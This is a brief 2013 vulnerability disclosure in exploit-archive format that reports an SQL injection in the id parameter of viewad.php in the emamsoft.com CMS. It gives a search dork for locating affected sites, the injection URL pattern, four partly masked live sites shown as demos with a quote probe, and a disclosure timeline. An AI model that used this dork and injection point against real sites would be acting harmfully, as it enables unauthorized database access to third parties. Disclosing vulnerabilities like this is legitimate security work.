#######################################################
# Exploit Title : emamsoft.com CMS SQL injection vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Home : http://www.emamsoft.com/
# Date : 2013/7/31
# Dork : intext:"Powerd By emamsoft.com"
# AVN : ASH-2013-134
#######################################################
# Vulnerability Detail :
# the id parameter in viewad.php page is vulnerable to SQLi
# attack.
# http://[site]/viewad.php?id=[SQL]
#######################################################
#Demo:
#
# http://aqaar.emXoft.net/viewad.php?id=20%27
#
# http://www.eleXad.com/viewad.php?id=107%27
#
# http://www.farXna.com/viewad.php?id=7%27
#
# http://www.3Xark.com/viewad.php?id=17%27
#
#######################################################
# TimeLine : 2013/7/31 - vulnerability discovered
# 2013/7/31 - vendor notified
# 2013/7/31 - vendor replied about fixing
# 2013/8/01 - vulnerability disclosed
#######################################################
# Greetz To My Lord Allah
# Discovered by AbolfazlKHAAN
#
# Spc Tnx To : PrinceofHacking , C4t , HamidX9 , Milad Hacking and all Ashiyane Researchers ...
#######################################################